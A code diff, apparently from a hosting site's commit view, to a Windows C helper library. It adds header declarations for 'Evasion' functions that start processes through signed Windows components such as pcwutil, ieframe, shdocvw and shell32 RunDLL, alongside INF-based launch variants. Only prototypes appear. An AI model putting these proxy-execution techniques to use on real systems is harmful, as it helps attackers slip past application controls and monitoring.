<ClCompile Include="CreateProcessFromShdocVwOpenUrl.cpp">
|
||||
<Filter>Source Files\Windows API Helper Functions\Evasion</Filter>
|
||||
</ClCompile>
|
||||
<ClCompile Include="CreateProcessFromShell32ShellExecRunDll.cpp">
|
||||
<Filter>Source Files\Windows API Helper Functions\Evasion</Filter>
|
||||
</ClCompile>
|
||||
</ItemGroup>
|
||||
<ItemGroup>
|
||||
<ClInclude Include="Internal.h">
|
||||
|
|
|
@ -47,9 +47,6 @@
|
|||
|
||||
#define Get16Bits(d) ((((UINT32)(((CONST UINT8*)(d))[1])) << 8) +(UINT32)(((CONST UINT8*)(d))[0]))
|
||||
|
||||
#define InlineGetCurrentThread ((HANDLE)(LONG_PTR)-2)
|
||||
#define InlineGetCurrentProcess (HANDLE)((HANDLE)-1)
|
||||
|
||||
/*******************************************
|
||||
RAD HARDWARE BREAKPOINT HOOKING ENGINE DATA
|
||||
*******************************************/
|
||||
|
@ -221,6 +218,8 @@ DWORD GetPeSectionSizeInBytesW(_In_ LPCWSTR Path, _In_ LPCWSTR SectionName);
|
|||
DWORD GetPeSectionSizeInBytesA(_In_ LPCSTR Path, _In_ LPCSTR SectionName);
|
||||
BOOL ReadDataFromPeSectionW(_In_ LPCWSTR Path, _In_ LPCWSTR SectionName, _Inout_ PBYTE ReadData, _Inout_opt_ PDWORD DataReadInBytes);
|
||||
BOOL ReadDataFromPeSectionA(_In_ LPCSTR Path, _In_ LPCSTR SectionName, _Inout_ PBYTE ReadData, _Inout_opt_ PDWORD DataReadInBytes);
|
||||
HANDLE GetCurrentProcessNoForward(VOID);
|
||||
HANDLE GetCurrentThreadNoForward(VOID);
|
||||
|
||||
|
||||
|
||||
|
@ -364,6 +363,18 @@ BOOL CreateProcessFromINFSectionInstallStringNoCabW(LPCWSTR PathToInfFile, LPCWS
|
|||
BOOL CreateProcessFromINFSectionInstallStringNoCabA(LPCSTR PathToInfFile, LPCSTR NameOfSection);
|
||||
BOOL CreateProcessFromINFSetupCommandW(LPCWSTR PathToInfFile, LPCWSTR NameOfSection);
|
||||
BOOL CreateProcessFromINFSetupCommandA(LPCSTR PathToInfFile, LPCSTR NameOfSection);
|
||||
BOOL CreateProcessFromPcwUtilW(LPCWSTR PathToBinary);
|
||||
BOOL CreateProcessFromPcwUtilA(LPCSTR PathToBinary);
|
||||
BOOL CreateProcessFromINFSectionInstallStringNoCab2A(LPCSTR PathToInfFile, LPCSTR NameOfSection);
|
||||
BOOL CreateProcessFromINFSectionInstallStringNoCab2W(LPCWSTR PathToInfFile, LPCWSTR NameOfSection);
|
||||
BOOL CreateProcessFromIeFrameOpenUrlW(LPCWSTR PathToUrlFile);
|
||||
BOOL CreateProcessFromIeFrameOpenUrlA(LPCSTR PathToUrlFile);
|
||||
BOOL CreateProcessFromINFSectionInstallStringNoCab3W(LPCWSTR PathToInfFile, LPCWSTR NameOfSection); // <--- not implemented
|
||||
BOOL CreateProcessFromINFSectionInstallStringNoCab3A(LPCSTR PathToInfFile, LPCSTR NameOfSection); // <--- not implemented
|
||||
BOOL CreateProcessFromShdocVwOpenUrlW(LPCWSTR PathToUrlFile);
|
||||
BOOL CreateProcessFromShdocVwOpenUrlA(LPCSTR PathToUrlFile);
|
||||
BOOL CreateProcessFromShell32ShellExecRunDllW(LPCWSTR PathToFile);
|
||||
BOOL CreateProcessFromShell32ShellExecRunDllA(LPCSTR PathToFile);
|
||||
|
||||
|
||||
|
||||
|
|
Loading…
Reference in New Issue